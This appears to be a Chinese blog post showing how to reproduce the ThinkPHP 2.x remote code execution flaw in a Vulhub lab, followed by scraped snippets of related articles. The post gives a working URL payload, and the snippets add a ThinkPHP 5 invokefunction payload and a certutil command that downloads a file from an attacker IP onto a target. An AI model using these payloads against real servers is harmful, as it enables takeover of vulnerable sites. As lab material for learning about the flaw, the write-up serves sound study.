Thinkphp 2-rce 漏洞复现(vulhub)

最新推荐文章于 2024-09-08 16:56:15 发布
最新推荐文章于 2024-09-08 16:56:15 发布
阅读量381 收藏
点赞数 2
CC 4.0 BY-SA版权
分类专栏: vulhub漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/MDSEC/article/details/132386553

  1. 首先,你需要在本地或虚拟机上搭建一个运行Vulhub的环境。你可以从Vulhub的GitHub仓库中下载并安装Docker和docker-compose工具,然后克隆对应的ThinkPHP 2漏洞利用环境。

  2. 进入ThinkPHP 2漏洞利用环境所在的目录,打开docker-compose.yml文件,找到相关的端口映射配置信息。

  3. 运行命令docker-compose up -d启动漏洞环境。

  4. 使用浏览器访问http://localhost:port,其中port为你在docker-compose.yml文件中配置的端口号。

  5. 在浏览器中,你将看到一个简单的ThinkPHP应用程序。根据漏洞描述,你需要在URL中添加参数来触发漏洞。

  6. 将上述URL参数添加到应用程序的URL后面,然后按回车键执行请求。

  7. 如果成功利用漏洞,你将在浏览器中看到返回的结果,例如当前用户的信息。

复现过程

然后访问

 在请求url中加入

?s=/index/index/name/$%7B@phpinfo()%7D

 

 这样就复现成功了

微信公众号:猫蛋儿安全

最低0.47元/天 解锁文章

200万优质内容无限畅学
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce
qq_51577576的博客
10-02 2757
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce 漏洞复现 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞
复现Thinkphp 2.x 任意代码执行漏洞
记录并分享学习安全的知识点..
07-03 510
ThinkPHP是一个免费开源用户数量非常多的一个PHP开发框架,这个框架曾经爆出各种RCE和SQL注入漏洞。由于 ThinkPHP 中没有对控制器进行检测,导致在没有开启强制路由的情况下攻击者可以通过此漏洞进行远程命令执行。 ......
ThinkPHP2-RCE漏洞复现
weixin_73180072的博客
09-10 1061
这个函数会接收用户的输入,并将其存储在一个缓存文件中,以供后续使用。然而,由于没有对用户输入进行适当的过滤和验证,攻击者可以构造一个包含恶意代码的输入数据,并将其提交给该函数。当其他用户访问该应用程序时,这些恶意代码就会被执行,攻击者就可以控制整个服务器。造成该漏洞的原因在于ThinkPHP 2.x版本中,某些函数没有对用户输入进行严格的过滤和验证,导致攻击者可以通过构造恶意输入来绕过安全防护,执行恶意代码。攻击者通过利用该漏洞,可以在服务器上执行任意PHP代码,从而控制服务器。成功连接,获取shell。
thinkphp 2-rce
weixin_51692662的博客
11-01 579
thinkphp 2-rce
thinkphp2rce漏洞复现
mlws1900的博客
07-07 1145
0x01 漏洞描述 描述: ThinkPHP框架 - 是由上海顶想公司开发维护的MVC结构的开源PHP框架,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。 ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞0x02 影响版本 影响Thinkphp 2.x的版本0x03 漏洞利用root权限启动docker(我用kali不给root没法搭建环境) 查看docker进
thinkphp2-rce远程代码执行漏洞
weixin_45653478的博客
04-27 563
ThinkPHP 2.x版本中,使用的/e模式匹配路由:导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞
thinkphp 2 - rce漏洞复现
2301_76467680的博客
06-28 261
打开页面成功说明存在漏洞。利用eval函数进行绕过。
vulhubthinkphp5 2-rce 5.0.23-rce 5-rce 漏洞复现
m0_75036923的博客
09-07 901
【代码】【vulhubthinkphp5 2-rce 5.0.23-rce 5-rce 漏洞复现
vuhub thinkphp-5-rce漏洞复现
qq_46804551的博客
04-24 664
搭建 your-ip:8080 搭建成功 漏洞复现 ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5中,由于框架错误地处理了控制器名称,因此如果网站未启用强制路由(默认设置),则该框架可以执行任何方法,从而导致RCE漏洞。 poc: 它将执行phpinfo /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
ThinkPHP2--RCE漏洞复现
m0_74402888的博客
05-03 1317
var['\1']="\2" 这里双引号引发函数执行,了解为什么${}会执行,在PHP当中,${}是可以构造一个变量的,{}写的是一般的字符,那么就会被当成变量,比如${a}等价于$a,那如果{}写的是一个已知函数名称呢?()值提取匹配的字符串,有几个括号就代表有几个匹配的字符串,看结果我们就知道,我们的目的是将键和值分别提取出来,所有有两个(),一个匹配键,一个匹配值。$a的执行语句执行了(注意如果要实现该代码需要修改php的版本为5.x的版本)s=a/a/a/${phpinfo()} 其中a随意。
thinkphp2.xRCE漏洞复现
kjssy的博客
08-19 217
启动环境之后访问ip:8080。
vulhub系列之thinkphp(2-rce、5.0.23-rce、5-rce、in-sqlinjection)
weixin_43071873的博客
11-24 1796
Thinkphp 2.x 任意代码执行 漏洞详情: ThinkPHP是一个免费开源用户数量非常多的一个PHP开发框架。ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: KaTeX parse error: Undefined control sequence: \w at position 23: …reg_replace('@(\̲w̲+)'.depr.’([^’.KaTeX parse error: Undefined control sequence: \/ at po
ThinkPHP 2.x RCE
weixin_45439731的博客
07-26 403
preg_replace(‘正则规则’,‘替换字符’,‘目标字符’)即:在目标字符中寻找符合正则规则的字符,替换为替换字符,如果此时的正则规则中使用了/e这个修饰符,则存在代码执行漏洞。知识点:/e 修饰符配合preg_replace()函数使用,可以把匹配到的字符串当作正则表达式执行PHP版本在5.2~5.6可以执行,但在PHP>=7时,不支持/e修饰符。
RCE命令注入
m0_75178803的博客
06-18 662
a=certutil -urlcahce -split -f http://192.168.160.135(攻击机)/1.txt 2.php。certutil -urlcache -split -f http://192.168.160.135(攻击机)/1.txt 2.php。在靶机(192.168.31.187)下的1.php查看上传的攻击机(192.168.160.135)中的2.php文件。漏洞的起源是在开发的过程中带有输入-执行功能的系统时,由于输入过滤不严谨,导致的命令产生了注入。
vulhubthinkphp 2-rce 5.0.23-rce 5-rce in-sqlinjection lang-rce漏洞复现
qq_58873970的博客
09-07 768
----------------梦想,想像力和希望实现这些梦想的人的勇气充满希望。
thinkphp漏洞复现2-RCE+5.0.23-RCE+5-RCE远程代码执行漏洞+in-sqlinjectionSQL注入漏洞
serendipity1130的博客
09-01 1804
参考文章:https://blog.youkuaiyun.com/weixin_43071873/article/details/110084577 一、2-RCE 漏洞详情: ThinkPHP是一个免费开源的一个PHP开发框架。ThinkPHP2.x版本中,使用preg_replace的/e模式匹配路由: 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。 preg_replace(‘正则规则’,‘替换字符’,‘目标字符’) 如果目标字符存在符合正则规则的字符,那么就替换为替换字符,如果此时
vulhub think PHP 2-rce远程命令执行漏洞
qq_65852138的博客
09-08 617
vulhub think PHP 2-rce远程命令执行漏洞
Thinkphp:有你真好
weixin_34274029的博客
09-10 216
ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。最早诞生于2006年初,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进。[1] ThinkPHP是一个...
docker 支持的靶机
最新发布
03-27
- **Vulhub**:提供多种Web漏洞环境(如ThinkPHP RCE、Jenkins RCE),使用Docker Compose一键部署[^3]。 - **OWASP Juice Shop**:模拟包含常见Web漏洞的在线商店,支持Docker镜像直接运行。 2. **系统漏洞...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值